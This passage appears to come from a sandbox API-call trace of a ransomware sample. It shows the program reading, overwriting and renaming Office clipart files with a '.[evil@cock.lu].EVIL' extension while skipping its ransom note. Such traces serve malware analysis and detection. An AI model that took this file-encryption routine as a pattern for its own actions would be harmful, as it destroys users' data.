lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.148] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe20, lpOverlapped=0x0) returned 1 [0116.148] CloseHandle (hObject=0x1a8) returned 1 [0116.148] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0116.148] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0116.148] __uncaught_exception () returned 0x84b1160800 [0116.148] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0116.148] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01157_.wmf.[evil@cock.lu].evil")) returned 1 [0116.149] ??_V@YAXPEAX@Z () returned 0x1 [0116.152] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01157_.WMF", dwFileAttributes=0x200) returned 0 [0116.152] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0116.152] wcsstr (_Str="DD01160_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0116.152] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 69 [0116.152] wcscmp (_String1="DD01160_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0116.152] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01160_.WMF") returned 0x0 [0116.152] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 0x45 [0116.152] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0116.153] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8b4, lpOverlapped=0x0) returned 1 [0116.161] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.161] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.161] _errno () returned 0x84b1160840 [0116.161] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.161] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8c0, lpOverlapped=0x0) returned 1 [0116.161] CloseHandle (hObject=0x1a8) returned 1 [0116.161] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0116.161] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0116.161] __uncaught_exception () returned 0x84b1160800 [0116.161] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0116.161] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01160_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01160_.wmf.[evil@cock.lu].evil")) returned 1 [0116.162] ??_V@YAXPEAX@Z () returned 0x1 [0116.165] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01160_.WMF", dwFileAttributes=0x200) returned 0 [0116.165] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0116.165] wcsstr (_Str="DD01162_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0116.165] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 69 [0116.165] wcscmp (_String1="DD01162_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0116.165] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01162_.WMF") returned 0x0 [0116.165] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF") returned 0x45 [0116.165] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0116.167] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8fc, lpOverlapped=0x0) returned 1 [0116.180] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.180] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.180] _errno () returned 0x84b1160840 [0116.180] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.180] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x900, lpOverlapped=0x0) returned 1 [0116.180] CloseHandle (hObject=0x1a8) returned 1 [0116.180] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0116.180] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0116.180] __uncaught_exception () returned 0x84b1160800 [0116.180] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0116.180] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01162_.wmf.[evil@cock.lu].evil")) returned 1 [0116.181] ??_V@YAXPEAX@Z () returned 0x1 [0116.184] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01162_.WMF", dwFileAttributes=0x200) returned 0 [0116.184] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0116.184] wcsstr (_Str="DD01163_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0116.184] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 69 [0116.184] wcscmp (_String1="DD01163_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0116.184] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01163_.WMF") returned 0x0 [0116.184] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF") returned 0x45 [0116.184] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0116.186] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8fc, lpOverlapped=0x0) returned 1 [0116.192] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.192] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.192] _errno () returned 0x84b1160840 [0116.193] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.193] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x900, lpOverlapped=0x0) returned 1 [0116.193] CloseHandle (hObject=0x1a8) returned 1 [0116.193] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0116.193] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0116.193] __uncaught_exception () returned 0x84b1160800 [0116.193] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0116.194] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf.[evil@cock.lu].evil")) returned 1 [0116.194] ??_V@YAXPEAX@Z () returned 0x1 [0116.197] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF", dwFileAttributes=0x200) returned 0 [0116.197] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0116.197] wcsstr (_Str="DD01166_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0116.197] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 69 [0116.197] wcscmp (_String1="DD01166_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0116.197] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01166_.WMF") returned 0x0 [0116.197] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF") returned 0x45 [0116.197] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0116.199] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x820, lpOverlapped=0x0) returned 1 [0116.205] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.205] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.205] _errno () returned 0x84b1160840 [0116.205] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.205] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x840, lpOverlapped=0x0) returned 1 [0116.206] CloseHandle (hObject=0x1a8) returned 1 [0116.206] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0116.206] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0116.206] __uncaught_exception () returned 0x84b1160800 [0116.206] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0116.206] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01166_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01166_.wmf.[evil@cock.lu].evil")) returned 1 [0116.207] ??_V@YAXPEAX@Z () returned 0x1 [0116.209] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01166_.WMF", dwFileAttributes=0x200) returned 0 [0116.210] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0116.210] wcsstr (_Str="DD01167_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0116.210] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 69 [0116.210] wcscmp (_String1="DD01167_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0116.210] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01167_.WMF") returned 0x0 [0116.210] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 0x45 [0116.210] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01167_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0116.211] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x820, lpOverlapped=0x0) returned 1 [0116.230] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.230] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.230] _errno () returned 0x84b1160840 [0116.230] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.230] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x840, lpOverlapped=0x0) returned 1 [0116.231] CloseHandle (hObject=0x1a8) returned 1 [0116.231] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0116.231] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0116.231] __uncaught_exception () returned 0x84b1160800 [0116.231] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0116.231] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01167_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01167_.wmf.[evil@cock.lu].evil")) returned 1 [0116.237] ??_V@YAXPEAX@Z () returned 0x1 [0116.239] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF", dwFileAttributes=0x200) returned 0 [0116.239] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0116.239] wcsstr (_Str="DD01168_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0116.239] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 69 [0116.239] wcscmp (_String1="DD01168_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0116.240] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01168_.WMF") returned 0x0 [0116.240] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 0x45 [0116.240] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01168_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0116.242] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7d4, lpOverlapped=0x0) returned 1 [0116.279] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.279] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.279] _errno () returned 0x84b1160840 [0116.279] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.279] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7e0, lpOverlapped=0x0) returned 1 [0116.280] CloseHandle (hObject=0x1a8) returned 1 [0116.280] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0116.280] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0116.280] __uncaught_exception () returned 0x84b1160800 [0116.280] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0116.280] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01168_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01168_.wmf.[evil@cock.lu].evil")) returned 1 [0116.281] ??_V@YAXPEAX@Z () returned 0x1 [0116.283] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF", dwFileAttributes=0x200) returned 0 [0116.284] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0116.284] wcsstr (_Str="DD01169_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0116.284] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 69 [0116.284] wcscmp (_String1="DD01169_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0116.284] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01169_.WMF") returned 0x0 [0116.284] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 0x45 [0116.284] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01169_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0116.285] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7e4, lpOverlapped=0x0) returned 1 [0116.304] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.304] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.304] _errno () returned 0x84b1160840 [0116.304] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.304] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x800, lpOverlapped=0x0) returned 1 [0116.304] CloseHandle (hObject=0x1a8) returned 1 [0116.304] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0116.304] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0116.304] __uncaught_exception () returned 0x84b1160800 [0116.304] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0116.305] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01169_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01169_.wmf.[evil@cock.lu].evil")) returned 1 [0116.305] ??_V@YAXPEAX@Z () returned 0x1 [0116.308] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF", dwFileAttributes=0x200) returned 0 [0116.308] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0116.308] wcsstr (_Str="DD01170_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0116.308] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 69 [0116.308] wcscmp (_String1="DD01170_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0116.308] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="DD01170_.WMF") returned 0x0 [0116.308] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 0x45 [0116.308] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01170_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0116.310] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x964, lpOverlapped=0x0) returned 1 [0116.316] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.316] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0116.316] _errno () returned 0x84b1160840 [0116.316] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.316] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x980, lpOverlapped=0x0) returned 1 [0116.316] CloseHandle (hObject=0x1a8) returned 1 [0116.316] 